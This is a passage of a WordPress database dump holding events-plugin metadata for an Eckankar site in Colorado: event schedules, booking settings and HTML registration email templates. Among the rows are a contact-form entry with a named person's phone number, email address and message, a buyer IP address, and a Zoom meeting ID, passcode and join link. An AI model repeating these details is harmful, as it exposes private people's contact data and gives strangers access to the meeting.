California)\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"172.89.183.33\";}}'),(173387,267564,'mec_price','0'),(173388,267564,'mec_gateway','MEC_gateway_free'),(173389,267564,'mec_gateway_label','Free'),(173398,267566,'_field_362','Kay'),(173399,267566,'_field_363','Patterson'),(173400,267566,'_field_370','9709867542'),(173401,267566,'_field_364','Kgbykay@gmail.com'),(173402,267566,'_field_365','Grand Junction Group.'),(173403,267566,'_field_366','I am living in Grand Junction area now and am looking for the group here.\nCould someone please reach out to me . Thank You'),(173404,267566,'_form_id','39'),(173405,267566,'_seq_num','4'),(173406,267568,'mec_color',''),(173407,267568,'mec_location_id','122'),(173408,267568,'mec_dont_show_map','0'),(173409,267568,'mec_organizer_id','1'),(173410,267568,'mec_read_more',''),(173411,267568,'mec_more_info',''),(173412,267568,'mec_more_info_title',''),(173413,267568,'mec_more_info_target','_self'),(173414,267568,'mec_cost',''),(173415,267568,'mec_currency','a:0:{}'),(173416,267568,'mec_additional_organizer_ids','a:0:{}'),(173417,267568,'mec_additional_location_ids','a:0:{}'),(173418,267568,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-12-18\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-12-18\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(173419,267568,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(173420,267568,'mec_certain_weekdays','a:0:{}'),(173421,267568,'mec_allday','0'),(173422,267568,'one_occurrence','0'),(173423,267568,'mec_hide_time','0'),(173424,267568,'mec_hide_end_time','0'),(173425,267568,'mec_comment',''),(173426,267568,'mec_timezone','global'),(173427,267568,'mec_countdown_method','global'),(173428,267568,'mec_public','1'),(173429,267568,'mec_start_date','2022-12-18'),(173430,267568,'mec_start_time_hour','10'),(173431,267568,'mec_start_time_minutes','30'),(173432,267568,'mec_start_time_ampm','AM'),(173433,267568,'mec_start_day_seconds','37800'),(173434,267568,'mec_end_date','2022-12-18'),(173435,267568,'mec_end_time_hour','11'),(173436,267568,'mec_end_time_minutes','30'),(173437,267568,'mec_end_time_ampm','AM'),(173438,267568,'mec_end_day_seconds','41400'),(173439,267568,'mec_repeat_status','0'),(173440,267568,'mec_repeat_type',''),(173441,267568,'mec_repeat_interval','1'),(173442,267568,'mec_repeat_end',''),(173443,267568,'mec_repeat_end_at_occurrences',''),(173444,267568,'mec_repeat_end_at_date',''),(173445,267568,'mec_advanced_days','a:0:{}'),(173446,267568,'mec_in_days',''),(173447,267568,'mec_not_in_days',''),(173448,267568,'mec_hourly_schedules','a:0:{}'),(173449,267568,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(173450,267568,'mec_tickets','a:0:{}'),(173451,267568,'mec_fees_global_inheritance','1'),(173452,267568,'mec_fees','a:0:{}'),(173453,267568,'mec_ticket_variations_global_inheritance','1'),(173454,267568,'mec_ticket_variations','a:0:{}'),(173455,267568,'mec_reg_fields_global_inheritance','1'),(173456,267568,'mec_reg_fields','a:0:{}'),(173457,267568,'mec_bfixed_fields','a:0:{}'),(173458,267568,'mec_op','a:0:{}'),(173459,267568,'mec_fields','a:0:{}'),(173460,267568,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(173461,267568,'mec_event_status','EventScheduled'),(173462,267568,'mec_moved_online_link',''),(173463,267568,'mec_cancelled_reason',''),(173464,267568,'mec_display_cancellation_reason_in_single_page',''),(173465,267568,'protect_children',''),(173466,267568,'passster_activate_global_protection',NULL),(173467,267568,'passster_activate_protection',NULL),(173468,267568,'passster_protection_type','password'),(173469,267568,'boldgrid_hide_page_title','0'),(173470,267568,'_thumbnail_id','265138'),(173473,267568,'_dp_original','266311'),(173472,267568,'boldgrid_in_page_containers','1'),(173474,267568,'_edit_lock','1671040116:2'),(173475,267568,'_edit_last','2'),(173476,267569,'mec_color',''),(173477,267569,'mec_location_id','118'),(173478,267569,'mec_dont_show_map','0'),(173479,267569,'mec_organizer_id','1'),(173480,267569,'mec_read_more',''),(173481,267569,'mec_more_info',''),(173482,267569,'mec_more_info_title',''),(173483,267569,'mec_more_info_target','_self'),(173484,267569,'mec_cost',''),(173485,267569,'mec_currency','a:0:{}'),(173486,267569,'mec_additional_organizer_ids','a:0:{}'),(173487,267569,'mec_additional_location_ids','a:0:{}'),(173488,267569,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-12-18\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-12-18\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(173489,267569,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(173490,267569,'mec_certain_weekdays','a:0:{}'),(173491,267569,'mec_allday','0'),(173492,267569,'one_occurrence','0'),(173493,267569,'mec_hide_time','0'),(173494,267569,'mec_hide_end_time','0'),(173495,267569,'mec_comment',''),(173496,267569,'mec_timezone','global'),(173497,267569,'mec_countdown_method','global'),(173498,267569,'mec_public','1'),(173499,267569,'mec_start_date','2022-12-18'),(173500,267569,'mec_start_time_hour','10'),(173501,267569,'mec_start_time_minutes','30'),(173502,267569,'mec_start_time_ampm','AM'),(173503,267569,'mec_start_day_seconds','37800'),(173504,267569,'mec_end_date','2022-12-18'),(173505,267569,'mec_end_time_hour','11'),(173506,267569,'mec_end_time_minutes','30'),(173507,267569,'mec_end_time_ampm','AM'),(173508,267569,'mec_end_day_seconds','41400'),(173509,267569,'mec_repeat_status','0'),(173510,267569,'mec_repeat_type',''),(173511,267569,'mec_repeat_interval','1'),(173512,267569,'mec_repeat_end',''),(173513,267569,'mec_repeat_end_at_occurrences',''),(173514,267569,'mec_repeat_end_at_date',''),(173515,267569,'mec_advanced_days','a:0:{}'),(173516,267569,'mec_in_days',''),(173517,267569,'mec_not_in_days',''),(173518,267569,'mec_hourly_schedules','a:0:{}'),(173519,267569,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(173520,267569,'mec_tickets','a:1:{i:1;a:17:{s:4:\"name\";s:24:\"Book Discussion - Online\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}}}'),(173521,267569,'mec_fees_global_inheritance','1'),(173522,267569,'mec_fees','a:0:{}'),(173523,267569,'mec_ticket_variations_global_inheritance','1'),(173524,267569,'mec_ticket_variations','a:0:{}'),(173525,267569,'mec_reg_fields_global_inheritance','1'),(173526,267569,'mec_reg_fields','a:0:{}'),(173527,267569,'mec_bfixed_fields','a:0:{}'),(173528,267569,'mec_op','a:0:{}'),(173529,267569,'mec_fields','a:0:{}'),(173530,267569,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6028:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<p>&nbsp;</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>813 8144 5634<br />\r\n<b>Passcode:</b> 889898</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us06web.zoom.us/j/81381445634?pwd=bGJ2UXBCQllmTnU4SHlGRHNFWTZZZz09\">https://us06web.zoom.us/j/81381445634?pwd=bGJ2UXBCQllmTnU4SHlGRHNFWTZZZz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:31:\"Admin  - New Event Registration\";s:7:\"content\";s:9974:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  